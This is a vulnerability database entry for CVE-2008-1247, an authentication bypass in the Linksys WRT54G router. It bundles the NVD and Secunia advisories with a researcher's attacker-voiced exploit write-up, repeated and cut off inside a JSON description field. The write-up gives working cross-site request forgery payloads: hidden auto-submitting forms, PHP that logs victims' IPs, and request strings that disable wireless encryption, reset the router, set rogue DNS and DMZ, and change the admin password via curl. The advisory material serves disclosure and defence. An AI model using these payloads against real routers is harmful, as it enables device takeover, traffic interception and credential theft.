Vulnerability from variot - Updated: 2023-12-18 11:26The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. The problem is CVE-2006-5202 And may overlap.A third party may perform any administrator action through the following direct requests: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. Successful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. The issues affect firmware v1.00.9; other versions may also be vulnerable. ----------------------------------------------------------------------
A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched.
Download and test it today: https://psi.secunia.com/
Read more about this new version: https://psi.secunia.com/?page=changelog
TITLE: Linksys WRT54G Security Bypass Vulnerability
SECUNIA ADVISORY ID: SA29344
VERIFY ADVISORY: http://secunia.com/advisories/29344/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE:
From local network
OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/
DESCRIPTION: meathive has reported a vulnerability in Linksys WRT54G, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to improper authorization checks when performing administrative actions via the web interface. This can be exploited to perform restricted actions by directly accessing Basic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri, dmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri, vpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri, ping.tri, tracert.tri, or rstatus.tri.
WRT54G v5/v6: Install version 1.02.5.
WRT54G v8: Install version 8.00.5.
WRT54G v8.2: Install version 8.2.05.
PROVIDED AND/OR DISCOVERED BY: meathive
ORIGINAL ADVISORY: http://kinqpinz.info/lib/wrt54g/own.txt
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. __ _ _ ___ ____ ____ ____ _____ ____ ____ _____ ___ | l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \ | ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y | \ | | | | || Q || / | | | | || __j | | | | || l_ | O | | Y | | | | || || | | | | | || / | __ | | | | || _] | | | .
++| Intro
This text is in addition to the findings I have already made public regarding the Linksys WRT54G wireless router and firewall gateway device. The scripts that process configuration changes do not require authentication and therefore can be altered remotely via simple form submissions written in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous findings and the demo page with sample exploits.
++| Let's Get Dirty
You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows how forms can be constructed in HTML that take advantage of the major flaws present within the insecure router. In my previous documentation I showed how it is possible to alter configuration parameters both via Linux command line using curl and HTML form submissions. In this text I demonstrate how to do these very same things transparently using a combination of HTML form construction with JavaScript that automagically submits our desired changes.
The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all that is required in order to submit our form that will be constructed using GET parameters observed from the device's Web interface.
document.f.submit();
This submits forms hidden within the Webpage. Our first example code enables wireless access with an SSID of our choosing. In this instance, I will use the SSID "kinqpinz".
The reason this works is simple: configuration parameters are constructed in the URL in the Web interface, hosted by default at the address http://192.168.1.1. One can view these parameters while configuring their device. The code above simply constructs a URL that is processed by the router's IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser:
http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en
It's simple enough to understand what's going on. Each variable passed in the URL describes exactly what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part to exploiting the router is the fact that you cannot alter settings using a URL like the one above. That would result in a GET request on behalf of the device, whereas we're interested in POST requests that actually trigger configuration changes. A GET request does nothing. Below I describe a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, and a touch of PHP to grab the mark's external IP.
++| Remote Real World Attack Scenario
So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It has made a few assumptions about your environment, however. One major assumption is that you've kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes you've made to the router in terms of security, e.g., strong password, wireless encryption, access restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do NOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so that you do not fall victim to a malicious individual hosting code that will be presented in this text.
++| Remote Real World Attack Scenario Requirements
On http://www.hacker.tld a page is hosted that contains the following: (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; (2) JavaScript that submits these forms transparently; (3) PHP or similar server-side code that acquires the mark's external IP address as they browse the page; and, (4) PHP or similar server-side code that retains the mark's external IP address in the event that the remote form submission is successful, thus allowing the remote attacker to further exploit the device.
http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP is used - though any server-side language is suitable - for obtaining the external IP of any individual viewing the exploit page and writes this information to a log file.
The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute and submitting the form.
document.f.submit();All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the HTML form's 'hidden' attribute.
What you should observe from this is the form name of "f" which is used in the JS to submit the form as well as the various 'name' and 'value' attributes that are used to create a URL such as this:
submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en
Do note that without any one of these parameters, the exploit fails and nothing changes. All of the elements must remain in place even if they do not directly make sense. They are simply options that the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case matters and do not forget that the request must be POST, not GET. Also different config changes require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log.
Now that the malicious page has been composed and sits online living and waiting for marks at http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom PHP logging script. In mark.txt, our logging file, sample output would resemble something like the following.
Potential mark resides at 1.1.1.1
Potential mark resides at 2.2.2.2
Potential mark resides at 3.3.3.3
So forth...
They are potential marks because it is unknown whether or not they are using the WRT54G with a supported firmware version that is exploitable using these techniques, and/or the exploit attempt failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not using the default local address (good for them) that this attack relies on.
When they browse the page, because we have set no timeout for this change to occur, they are instantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, does not inform the user if they were educated enough of what has just happened, so they may continue on doing whatever they were doing, more often than not unaware of what has just happened. At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at our leisure and further test the remote host whether or not they are vulnerable to attack. At the very least, we may decide to completely reset the router to rest assured we know its current state to make further compromise a snap, such as altering the device's DNS records for sniffing traffic. This is quite feasible, here's how.
This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en
Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs all incoming and outgoing requests before passing them on to the next in line.
This is indeed convoluted but all of these values must be in place in order to be successful. What is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the following URL that is submitted to http://192.168.1.1/Basic.tri.
http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en
++| An Alternative (with JavaScript)
This is the basic exploitation method of the router although the attacker has many alternatives of submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. A few alternative methods would include using a JavaScript onClick function within a standard looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:
...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this standard looking navigation link, e.g.:
var xhr=false; if(window.XMLHttpRequest) { xhr=new XMLHttpRequest(); } else if(window.ActiveXObject) { xhr=new ActiveXObject("Microsoft.XMLHTTP"); } function xhrRequest() { if(xhr) { xhr.open("POST", "http://192.168.1.1/Security.tri", true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange=function() { if(xhr.readyState == 4 && xhr.status == 200) { var success=xhr.responseText; } } xhr.send("SecurityMode=0&layout=en"); } }
The example above effectively disables all wireless encryption so that if you happen to live close enough to this poor individual, it is your duty to pwn their wireless by enabling open access for everybody in the neighborhood! Here's the URL for disabling wireless encryption:
http://192.168.1.1/Security.tri?SecurityMode=0&layout=en
++| An Alternative (without JavaScript)
You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent looking methods of compromising your WRT54G. For example, user registration for a bulletin board or forum system. The site must acquire a minimal amount of information in order to create the account so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the URL once again:
http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en
Again it is a different script processing the request on behalf of the router's internal operating system, dmz.tri, but it still does not require authentication prior to changing the settings we wish to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:
...and add these values to their user registration page with standard username/password/e-mail fields... Username:Password:
Confirm Password:
...that can be found on traditional forums these days. The mark submits and exploits his/her own router although they believe they are at least minimally technically savvy by using a combination of technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms we use to store the router configs are hidden, and the normal user registration forms are not, thus it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has detected that a potential attack is taking place it is likely too late as the mastermind behind http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration changes within 10 seconds, which is plenty of time for them to open another terminal and change the administrative login to block our mark from changing their settings, e.g.:
curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http:///manage.tri
Here the hacker can now log in as admin with password 'pwn' with complete freedom to REMOTELY monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more.
++| Conclusion
It is my intention in finalizing this document that the reader understands that the Linksys WRT54G firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care whether or not you have the level of privilege thought to be necessary for manipulating sensitive objects.
Thanks go to hw2B for suggesting I write all of this garbage out.
++| URLs
https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) https://kinqpinz.info/lib/wrt54g/own2.txt (this document) http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0170",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "1.00.9"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "1.00.9"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1.01.0.9"
}
],
"sources": [
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:1.00.9:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1247"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "meathive",
"sources": [
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
],
"trust": 0.8
},
"cve": "CVE-2008-1247",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2008-1247",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-31372",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1247",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-125",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-31372",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. The problem is CVE-2006-5202 And may overlap.A third party may perform any administrator action through the following direct requests: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. \nSuccessful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. \nThe issues affect firmware v1.00.9; other versions may also be vulnerable. ----------------------------------------------------------------------\n\nA new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI\nhas been released. The new version includes many new and advanced\nfeatures, which makes it even easier to stay patched. \n\nDownload and test it today:\nhttps://psi.secunia.com/\n\nRead more about this new version:\nhttps://psi.secunia.com/?page=changelog\n\n----------------------------------------------------------------------\n\nTITLE:\nLinksys WRT54G Security Bypass Vulnerability\n\nSECUNIA ADVISORY ID:\nSA29344\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/29344/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nmeathive has reported a vulnerability in Linksys WRT54G, which can be\nexploited by malicious people to bypass certain security\nrestrictions. \n\nThe vulnerability is caused due to improper authorization checks when\nperforming administrative actions via the web interface. This can be\nexploited to perform restricted actions by directly accessing \nBasic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri,\ndmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri,\nvpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri,\nping.tri, tracert.tri, or rstatus.tri. \n\nWRT54G v5/v6:\nInstall version 1.02.5. \n\nWRT54G v8:\nInstall version 8.00.5. \n\nWRT54G v8.2:\nInstall version 8.2.05. \n\nPROVIDED AND/OR DISCOVERED BY:\nmeathive\n\nORIGINAL ADVISORY:\nhttp://kinqpinz.info/lib/wrt54g/own.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \t __ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___\n\t| l/ ]l j| \\ / \\ | \\l j| \\ | T l j| \\ | | / \\\n\t| \u0027 / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y\n\t| \\ | | | | || Q || _/ | | | | || __j | | | | || l_ | O |\n\t| Y | | | | || || | | | | | || / | __ | | | | || _] | |\n\t| . \n\n++| Intro\n----------------------\nThis text is in addition to the findings I have already made public regarding the Linksys WRT54G \nwireless router and firewall gateway device. The scripts that process configuration changes do not \nrequire authentication and therefore can be altered _remotely_ via simple form submissions written \nin HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous \nfindings and the demo page with sample exploits. \n\n++| Let\u0027s Get Dirty\n----------------------\nYou may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows\nhow forms can be constructed in HTML that take advantage of the major flaws present within the \ninsecure router. In my previous documentation I showed how it is possible to alter configuration \nparameters both via Linux command line using curl and HTML form submissions. In this text I \ndemonstrate how to do these very same things transparently using a combination of HTML form \nconstruction with JavaScript that automagically submits our desired changes. \n\nThe JavaScript is simple and is only used for submitting the form - a user-free mechanism that will \nredirect the user to their router and prompts them to log in. Once again, THE REQUEST TO \nAUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all \nthat is required in order to submit our form that will be constructed using GET parameters observed \nfrom the device\u0027s Web interface. \n\ndocument.f.submit();\n\nThis submits forms hidden within the Webpage. Our first example code enables wireless access with an\nSSID of our choosing. In this instance, I will use the SSID \"kinqpinz\". \n\n\u003cform name=\"f\" action=\"http://192.168.1.1/WBasic.tri\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"submit_type\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"channelno\" value=\"11\"\u003e\n \u003cinput type=\"hidden\" name=\"OldWirelessMode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"Mode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"SSID\" value=\"kinqpinz\"\u003e\n \u003cinput type=\"hidden\" name=\"channel\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"Freq\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"wl_closed\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"sesMode\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\u003c/form\u003e\n\nThe reason this works is simple: configuration parameters are constructed in the URL in the Web \ninterface, hosted by default at the address http://192.168.1.1. One can view these parameters while \nconfiguring their device. The code above simply constructs a URL that is processed by the router\u0027s \nIOS script WBasic.tri. The URL resembles the following if you were to view it within your browser:\n\nhttp://192.168.1.1/WBasic.tri?submit_type=\u0026channelno=11\u0026OldWirelessMode=3\u0026Mode=3\u0026SSID=kinqpinz\u0026channel=6\u0026Freq=6\u0026wl_closed=1\u0026sesMode=1\u0026layout=en\n\nIt\u0027s simple enough to understand what\u0027s going on. Each variable passed in the URL describes exactly \nwhat its purpose is - at least the important ones such as \"SSID\" and \"channel\". The only tricky part \nto exploiting the router is the fact that you cannot alter settings using a URL like the one above. \nThat would result in a GET request on behalf of the device, whereas we\u0027re interested in POST \nrequests that actually trigger configuration changes. A GET request does nothing. Below I describe \na real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, \nand a touch of PHP to grab the mark\u0027s external IP. \n\n++| Remote Real World Attack Scenario\n----------------------\nSo http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It \nhas made a few assumptions about your environment, however. One major assumption is that you\u0027ve \nkept your router\u0027s default local gateway address, namely 192.168.1.1. No matter what other changes \nyou\u0027ve made to the router in terms of security, e.g., strong password, wireless encryption, access \nrestrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do \nNOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so \nthat you do not fall victim to a malicious individual hosting code that will be presented in this \ntext. \n\n++| Remote Real World Attack Scenario Requirements\n----------------------\nOn http://www.hacker.tld a page is hosted that contains the following:\n (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely;\n (2) JavaScript that submits these forms transparently;\n (3) PHP or similar server-side code that acquires the mark\u0027s external IP address as they browse \n the page; and,\n (4) PHP or similar server-side code that retains the mark\u0027s external IP address in the event that \n the remote form submission is successful, thus allowing the remote attacker to further exploit the \n device. \n\nhttp://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP \nis used - though any server-side language is suitable - for obtaining the external IP of any \nindividual viewing the exploit page and writes this information to a log file. \n\u003c?php\n $ip=$_SERVER[\u0027REMOTE_ADDR\u0027];\n $toWrite=\"Potential mark resides at $ip\\n\\n\";\n $f=fopen(\"mark.txt\", \"a+\");\n fwrite($f, $toWrite);\n fclose($f);\n?\u003e\n\nThe JavaScript is as simple as retrieving the form object identified by the \u0027name\u0027 HTML attribute \nand submitting the form. \n\n\u003cscript type=\"text/javascript\"\u003e\n document.f.submit();\n\u003c/script\u003e\n\nAll hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the\nHTML form\u0027s \u0027hidden\u0027 attribute. \n\n\u003cform name=\"f\" action=\"http://192.168.1.1/WBasic.tri\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"submit_type\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"channelno\" value=\"11\"\u003e\n \u003cinput type=\"hidden\" name=\"OldWirelessMode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"Mode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"SSID\" value=\"kinqpinz\"\u003e\n \u003cinput type=\"hidden\" name=\"channel\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"Freq\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"wl_closed\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"sesMode\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\u003c/form\u003e\n\nWhat you should observe from this is the form name of \"f\" which is used in the JS to submit the form \nas well as the various \u0027name\u0027 and \u0027value\u0027 attributes that are used to create a URL such as this:\n\nsubmit_type=\u0026channelno=11\u0026OldWirelessMode=3\u0026Mode=3\u0026SSID=kinqpinz\u0026channel=6\u0026Freq=6\u0026wl_closed=1\u0026sesMode=1\u0026layout=en\n\nDo note that without any one of these parameters, the exploit fails and nothing changes. All of the \nelements must remain in place even if they do not directly make sense. They are simply options that \nthe processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case \nmatters and do not forget that the request must be POST, not GET. Also different config changes 